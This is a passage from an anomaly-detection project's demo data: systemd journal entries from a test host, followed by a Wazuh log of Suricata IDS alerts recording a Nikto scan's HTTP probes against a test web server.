"70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "USER_UNIT" : "sockets.target", "USER_INVOCATION_ID" : "57308a089fb44c85aa8b28764208cbb1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229604" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=372;b=e2b08827b5804427b422c10c84f1567e;m=9f397cd;t=5bd16e6b71734;x=c94451d35f946e0", "__REALTIME_TIMESTAMP" : "1615280941242164", "__MONOTONIC_TIMESTAMP" : "166959053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "USER_UNIT" : "basic.target", "USER_INVOCATION_ID" : "9279cf273e684a6cb8f893a4238d4ce9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229614" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=373;b=e2b08827b5804427b422c10c84f1567e;m=9f3982d;t=5bd16e6b71795;x=cfe3a72a477d7ed5", "__REALTIME_TIMESTAMP" : "1615280941242261", "__MONOTONIC_TIMESTAMP" : "166959149", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "MESSAGE" : "Started User Manager for UID 1000.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229762" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=374;b=e2b08827b5804427b422c10c84f1567e;m=9f398b2;t=5bd16e6b71819;x=759f2aa62d425194", "__REALTIME_TIMESTAMP" : "1615280941242393", "__MONOTONIC_TIMESTAMP" : "166959282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Default.", "USER_UNIT" : "default.target", "USER_INVOCATION_ID" : "deceef39a2384492929e08a3ad22033b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941231978" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=375;b=e2b08827b5804427b422c10c84f1567e;m=9f39918;t=5bd16e6b71880;x=c18702b1dbf43c11", "__REALTIME_TIMESTAMP" : "1615280941242496", "__MONOTONIC_TIMESTAMP" : "166959384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3272", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "eed00a68ffd84e31882105fd973abdd1", "USERSPACE_USEC" : "179998", "MESSAGE" : "Startup finished in 179ms.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941232011" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=376;b=e2b08827b5804427b422c10c84f1567e;m=bc70466;t=5bd16e88a83cd;x=4643ca9ef29700d7", "__REALTIME_TIMESTAMP" : "1615280971875277", "__MONOTONIC_TIMESTAMP" : "197592166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_UID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "MESSAGE" : " ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/bash", "_PID" : "1234", "_GID" : "1000", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", "_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971874922" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=377;b=e2b08827b5804427b422c10c84f1567e;m=bc71293;t=5bd16e88a91fb;x=c5d63933ce56dcfb", "__REALTIME_TIMESTAMP" : "1615280971878907", "__MONOTONIC_TIMESTAMP" : "197595795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "_PID" : "1234", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", "_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "MESSAGE" : "pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971878330" }logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/wazuh.log000066400000000000000000005173051437606560100315340ustar00rootroot00000000000000{"timestamp":"2020-03-04T19:18:35.196472+0000","rule":{"level":6,"description":"IDS event.","id":"20101","firedtimes":1,"mail":false,"groups":["ids"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.5603","full_log":"03/04/2020-19:18:35.196472 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:47564 -> 192.168.10.154:80","predecoder":{"timestamp":"03/04/2020-19:18:35.196472"},"decoder":{"parent":"snort","name":"snort"},"data":{"srcip":"192.168.10.238","dstip":"192.168.10.154:80","id":"1:2221030:1"},"location":"/var/log/forensic/suricata/fast.log"} {"timestamp":"2020-03-04T19:18:34.343787+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":1,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.6012","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.343787+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46938,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.343787+0000","flow_id":"2066313044966357.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46938","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ncf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.345338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":2,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.7549","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.345338+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46940,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.345338+0000","flow_id":"1697602987508313.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46940","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.347250+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":3,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.9086","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.347250+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46942,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.csc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.347250+0000","flow_id":"1217064866564597.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46942","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.csc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.349169+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":4,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.10623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.349169+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46944,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.el\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.349169+0000","flow_id":"883960087990575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46944","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.el","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.351261+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":5,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.12157","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.351261+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46946,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.idc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.351261+0000","flow_id":"455618704595240.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46946","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.idc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.353104+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":6,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.13693","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.353104+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46948,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.access\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.353104+0000","flow_id":"1306962827043002.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46948","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.access","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.355207+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":7,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.15237","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.355207+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46950,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.355207+0000","flow_id":"1369948522440834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46950","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp+","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.358195+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":8,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.16777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.358195+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46952,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.de\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.358195+0000","flow_id":"583080449044546.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46952","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.de","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.361389+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":9,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.18311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.361389+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46954,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.en\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.361389+0000","flow_id":"570105352846820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46954","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.en","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.365743+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":10,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.19845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.365743+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46956,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.365743+0000","flow_id":"776469941489987.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46956","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.367902+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP 